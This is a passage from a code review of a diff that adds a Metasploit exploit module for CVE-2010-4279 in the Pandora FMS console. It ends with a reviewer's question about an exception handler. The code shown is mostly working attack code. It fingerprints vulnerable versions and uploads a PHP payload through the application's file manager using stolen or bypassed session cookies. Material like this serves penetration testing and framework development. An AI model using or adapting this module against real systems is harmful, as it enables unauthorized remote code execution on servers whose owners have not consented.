modules/exploits/multi/http/pandora_upload_exec.rb

```diff
@@ -0,0 +1,173 @@
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Juan Galiana Lara',                         # Vulnerability discovery
+          'Raymond Nunez <rcnunez[at]upd.edu.ph>',     # Metasploit module
+          'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module
+          'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>',      # Metasploit module
+          '_flood <freshbones[at]gmail.com>',          # Metasploit module
+          'mubix <mubix[at]room362.com>',              # Auth bypass and file upload
+          'egypt <egypt[at]metasploit.com>',           # Auth bypass and file upload
+        ],
+      'References'     =>
+        [
+          ['CVE', '2010-4279'],
+          ['OSVDB',   '69549'],
+          ['BID',   '45112']
+        ],
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          ['Automatic Targeting', { 'auto' => true }]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Nov 30 2010",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),
+      ], self.class)
+  end
+
+  def check
+
+    base  = target_uri.path
+
+    # retrieve software version from login page
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri'    => normalize_uri(base, 'index.php')
+      })
+      if res and res.code == 200
+        #Tested on v3.1 Build PC100609 and PC100608
+        if res.body.include?("v3.1 Build PC10060")
+          return Exploit::CheckCode::Vulnerable
+        elsif res.body.include?("Pandora")
+          return Exploit::CheckCode::Detected
+        end
+      end
+      return Exploit::CheckCode::Safe
+    rescue ::Rex::ConnectionError
+      print_error("#{peer} - Connection failed")
+    end
+    return Exploit::CheckCode::Unknown
+
+  end
+
+  # upload a payload using the pandora built-in file upload
+  def upload(base, file, cookies)
+
+    begin
+      data = Rex::MIME::Message.new
+      data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}\"")
+      data.add_part("Go", nil, nil, 'form-data; name="go"')
+      data.add_part("images", nil, nil, 'form-data; name="directory"')
+      data.add_part("1", nil, nil, 'form-data; name="upload_file"')
+      data_post = data.to_s
+      data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+
+      res = send_request_cgi({
+        'method'  => 'POST',
+        'uri'     => normalize_uri(base, 'index.php'),
+        'cookie'  => cookies,
+        'ctype'   => "multipart/form-data; boundary=#{data.bound}",
+        'vars_get' => {
+          'sec'  => 'gsetup',
+          'sec2' => 'godmode/setup/file_manager',
+        },
+        'data'    => data_post
+      })
+
+      register_files_for_cleanup(@fname)
+      return res
+
+    rescue ::URI::InvalidURIError
```

Comment:
I don't see any place where this should be raised. Did you hit this in testing somehow?